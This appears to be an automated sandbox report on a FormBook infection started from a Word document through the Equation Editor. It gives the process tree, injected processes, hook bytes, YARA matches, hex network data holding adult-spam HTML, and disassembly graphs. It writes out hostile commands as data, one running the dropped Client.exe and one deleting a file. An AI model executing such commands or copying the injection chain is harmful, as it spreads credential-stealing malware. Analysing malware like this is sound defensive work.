26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 32 31 39 34 33 3b 26 23 32 37 37 30 30 3b 26 23 32 31 31 36 30 3b 26 23 32 34 35 37 37 3b 26 23 32 32 32 37 30 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35
                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>,&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;</title><meta name="keywords" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;" /><meta name="description" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345
                                                Aug 8, 2022 18:40:05.021940947 CEST10INData Raw: 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b
                                                Data Ascii: ;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;


                                                Code Manipulations

                                                User Modules

                                                Hook Summary

                                                Function NameHook TypeActive in Processes
                                                PeekMessageAINLINEexplorer.exe
                                                PeekMessageWINLINEexplorer.exe
                                                GetMessageWINLINEexplorer.exe
                                                GetMessageAINLINEexplorer.exe

                                                Processes

                                                Process: explorer.exe, Module: USER32.dll
                                                Function NameHook TypeNew Data
                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                                GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                                GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:18:38:13
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f020000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:2
                                                Start time:18:38:16
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:3
                                                Start time:18:38:17
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                Imagebase:0x4a120000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:6
                                                Start time:18:38:18
                                                Start date:08/08/2022
                                                Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                Imagebase:0xa20000
                                                File size:954368 bytes
                                                MD5 hash:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 24%, ReversingLabs
                                                Reputation:low

                                                General

                                                Target ID:9
                                                Start time:18:38:34
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\notepad.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
                                                Imagebase:0x660000
                                                File size:179712 bytes
                                                MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Target ID:10
                                                Start time:18:38:41
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0xff040000
                                                File size:3229696 bytes
                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:11
                                                Start time:18:39:20
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\ipconfig.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                Imagebase:0x370000
                                                File size:27136 bytes
                                                MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Target ID:12
                                                Start time:18:39:25
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Windows\SysWOW64\notepad.exe"
                                                Imagebase:0x4ab40000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:50.8%
                                                  Total number of Nodes:65
                                                  Total number of Limit Nodes:2
                                                  execution_graph 14298 322790 14299 3227d0 CloseHandle 14298->14299 14301 322801 14299->14301 14302 322a98 14303 322ae0 VirtualProtect 14302->14303 14305 322b1b 14303->14305 14343 36aff8 14344 36b004 14343->14344 14345 36b087 14344->14345 14351 4e65052 14344->14351 14355 4e60048 14344->14355 14359 4e650ef 14344->14359 14363 4e6001f 14344->14363 14367 4e616d0 14344->14367 14352 4e650fa 14351->14352 14370 37ea88 14352->14370 14356 4e601e2 14355->14356 14374 4a0b24 14356->14374 14360 4e650fa 14359->14360 14362 37ea88 CreateProcessW 14360->14362 14361 4e6514b 14361->14361 14362->14361 14364 4e60048 14363->14364 14366 4a0b24 VirtualAllocExNuma 14364->14366 14365 4e616e9 14365->14344 14366->14365 14368 4e616e9 14367->14368 14369 4a0b24 VirtualAllocExNuma 14367->14369 14368->14344 14369->14368 14371 37eb11 CreateProcessW 14370->14371 14373 37ecb3 14371->14373 14375 4a0b2a 14374->14375 14378 4a3780 14375->14378 14379 4a37c0 VirtualAllocExNuma 14378->14379 14381 4a2c8a 14379->14381 14306 37d398 14307 37d3e6 NtProtectVirtualMemory 14306->14307 14309 37d430 14307->14309 14310 37d898 14311 37d8e0 NtWriteVirtualMemory 14310->14311 14313 37d937 14311->14313 14314 87ba28 14316 87ba3d 14314->14316 14315 87bca4 14316->14315 14319 322540 14316->14319 14323 322548 14316->14323 14320 322545 NtQuerySystemInformation 14319->14320 14322 3225cb 14320->14322 14322->14316 14324 322590 NtQuerySystemInformation 14323->14324 14326 3225cb 14324->14326 14326->14316 14327 37dd98 14328 37ddd8 NtSetContextThread 14327->14328 14330 37de0c 14328->14330 14382 240b7b0 14383 240b7f5 NtCreateThreadEx 14382->14383 14385 240b851 14383->14385 14331 4a0178 14332 4a01b8 NtClose 14331->14332 14334 4a01e9 14332->14334 14335 4d33f8 14336 4d3443 LdrLoadDll 14335->14336 14338 4d3484 14336->14338 14339 37ce80 14340 37cecb NtAllocateVirtualMemory 14339->14340 14342 37cf12 14340->14342 14386 37f248 14387 37f290 NtResumeThread 14386->14387 14389 37f2c5 14387->14389

                                                  Executed Functions

                                                  Function 02400048 Relevance: 2.2, Strings: 1, Instructions: 913COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 782 2400048-2400071 783 2400074 782->783 784 240007e-24000d1 783->784 787 24000d7 784->787 788 2400439-2400459 784->788 787->783 787->788 789 2400382-240040f 787->789 790 2400214-24002a1 787->790 791 2400114-2400145 787->791 792 2400167-2400198 787->792 793 240014a-2400162 787->793 794 24002cb-240037d 787->794 795 240019d-24001d9 787->795 796 24001de-240020f 787->796 797 24000de-240010f 787->797 818 2400465-2400506 788->818 853 240041a-2400434 789->853 854 24002ac-24002c6 790->854 791->784 792->784 793->784 794->784 795->784 796->784 797->784 857 240050c 818->857 858 240107f-24010e5 818->858 853->784 854->784 857->858 866 2401c41-240a498 858->866 867 24010eb-2401111 858->867 867->866 872 2401117-2401163 867->872 876 24011e5-2401205 872->876 877 2401169-240118b 872->877 876->866 882 240120b-240121e 876->882 877->866 883 2401191-24011a6 877->883 882->866 886 2401224-2401255 882->886 883->866 887 24011ac-24011d7 883->887 886->866 890 240125b 886->890 887->866 891 24011dd-24011e3 887->891 892 2401261-2401281 890->892 891->892 892->866 895 2401287-240132d 892->895 895->866 902 2401333-2401335 895->902 903 24013c2-24013e4 902->903 904 240133b-240135b 902->904 903->866 909 24013ea-2401436 903->909 904->866 910 2401361-2401374 904->910 909->866 916 240143c 909->916 910->866 913 240137a-24013bd 910->913 917 2401442-2401479 913->917 916->917 917->866 921 240147f-24014ba 917->921 921->866 925 24014c0-24014d5 921->925 925->866 927 24014db-2401524 925->927 929 240152a-240154a 927->929 930 24015ab-24015cd 927->930 929->866 936 2401550-24015a6 929->936 930->866 935 24015d3-240161f 930->935 935->866 941 2401625 935->941 942 240162b-2401673 936->942 941->942 942->866 947 2401679-24016fd 942->947 947->866 952 2401703-2401705 947->952 953 240170b-240172d 952->953 954 240178d-24017ad 952->954 953->866 959 2401733-2401748 953->959 954->866 960 24017b3-2401803 954->960 959->866 963 240174e-240178b 959->963 965 2401809-2401840 960->965 963->965 965->866 970 2401846-2401859 965->970 970->866 972 240185f-2401898 970->972 972->866 976 240189e-24018ef 972->976 978 24018f5-2401917 976->978 979 240198c-24019bf 976->979 978->866 984 240191d-2401932 978->984 979->866 986 24019c5-2401a0e 979->986 984->866 988 2401938-240197b 984->988 990 2401a14-2401a34 986->990 988->866 992 2401981-2401987 988->992 990->866 995 2401a3a-2401a8a 990->995 992->990 995->866 1000 2401a90-2401aa5 995->1000 1000->866 1002 2401aab-2401b00 1000->1002 1004 2401b91-2401bc8 1002->1004 1005 2401b06-2401b28 1002->1005 1004->866 1012 2401bca-2401c0d 1004->1012 1005->866 1010 2401b2e-2401b8c 1005->1010 1017 2401c15-2401caa 1010->1017 1012->866 1016 2401c0f 1012->1016 1016->1017 1023 2401cb0 1017->1023 1024 24070b2-2407a0c 1017->1024 1023->1024 1031 2407a24-2407a47 1024->1031 1032 2407a0e-2407a22 1024->1032 1033 2407a4d-2407a59 1031->1033 1032->1033
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950989279.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2400000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ~?Rt
                                                  • API String ID: 0-1517691117
                                                  • Opcode ID: 1cca5bb6ab5b21d18866f0d06f5b3d8b345bb90045d2cb00677913dd56731e37
                                                  • Instruction ID: ca2457242033d4d746aeb837832ffa5f56412147cb9c12d0c599e4a60b8692a4
                                                  • Opcode Fuzzy Hash: 1cca5bb6ab5b21d18866f0d06f5b3d8b345bb90045d2cb00677913dd56731e37
                                                  • Instruction Fuzzy Hash: 08A2C6B4E502298FCBA4DF28EE94698B7F5BB98344F1055BA950DE7798DB305E84CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00321338 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1079 321338-321381 1081 321388-321392 1079->1081 1082 321395-3213c3 1081->1082 1083 3214f6-3214fd 1082->1083 1084 3213c9 1082->1084 1136 321504-321510 1083->1136 1084->1081 1084->1083 1085 321452-321467 1084->1085 1086 3213d0-3213e5 1084->1086 1087 3213f6-3213fa 1084->1087 1088 321515 1084->1088 1089 3216fa-32170d 1084->1089 1090 32167b-3216a3 1084->1090 1091 3214b9-3214f1 call 3210d0 1084->1091 1092 3216bf-3216d8 1084->1092 1093 32159f-3215c2 1084->1093 1094 321623 1084->1094 1095 321661-321676 1084->1095 1096 321486-3214b4 call 3210d0 1084->1096 1097 3213e7-3213f4 1084->1097 1098 3215c7-3215cb 1084->1098 1099 321567-321572 1084->1099 1100 3216a5-3216ba 1084->1100 1101 32164f-32165c 1084->1101 1102 32146c-321481 1084->1102 1085->1082 1086->1082 1105 321403-321414 1087->1105 1106 3213fc-321401 1087->1106 1103 32151a-32155a 1088->1103 1104 32170f-32171c 1089->1104 1090->1104 1091->1082 1155 3216df-3216f5 1092->1155 1093->1103 1114 32162c-32162e 1094->1114 1095->1103 1096->1082 1097->1082 1107 3215d4-3215e5 1098->1107 1108 3215cd-3215d2 1098->1108 1127 321574-32157a 1099->1127 1128 32158a-32159a 1099->1128 1100->1103 1101->1103 1102->1082 1103->1089 1156 321560 1103->1156 1140 32171f-321729 1104->1140 1120 321416-32144d 1105->1120 1106->1120 1123 3215e7-32161c 1107->1123 1108->1123 1130 321630-321635 1114->1130 1131 321637-321641 1114->1131 1120->1082 1123->1094 1138 32157e-321580 1127->1138 1139 32157c 1127->1139 1128->1103 1141 321648 1130->1141 1131->1141 1136->1094 1138->1128 1139->1128 1148 32172c-3217cb 1140->1148 1141->1101 1161 321874 1148->1161 1179 3217d1 1148->1179 1155->1103 1156->1088 1156->1089 1156->1090 1156->1092 1156->1093 1156->1094 1156->1095 1156->1098 1156->1099 1156->1100 1156->1101 1156->1140 1160 321834-321855 1156->1160 1156->1161 1162 32185a-32186f 1156->1162 1163 3217d8-3217dc 1156->1163 1164 32188b 1156->1164 1160->1148 1161->1164 1162->1148 1169 3217e5-3217f6 1163->1169 1170 3217de-3217e3 1163->1170 1168 321890-32192d 1164->1168 1182 321963-32196d 1168->1182 1189 32192f 1168->1189 1175 3217f8-32182f 1169->1175 1170->1175 1175->1148 1179->1140 1179->1160 1179->1161 1179->1162 1179->1163 1179->1164 1179->1182 1183 32194b-32195e 1179->1183 1183->1168 1189->1164 1189->1182 1189->1183
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: z@_`
                                                  • API String ID: 0-634204903
                                                  • Opcode ID: 486dee35f144d54ec4ab0a894b8296dc3ba2a9714fd2967645295d89f900c5e6
                                                  • Instruction ID: 48f852e9fb56ac568e5e2cb8ea72cc2a259e6928e5403421c37aaa290a473f40
                                                  • Opcode Fuzzy Hash: 486dee35f144d54ec4ab0a894b8296dc3ba2a9714fd2967645295d89f900c5e6
                                                  • Instruction Fuzzy Hash: B1F1D375F001188FC719DF78EA646AD77B3ABD4344B249429D016EBB68EF349D06CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

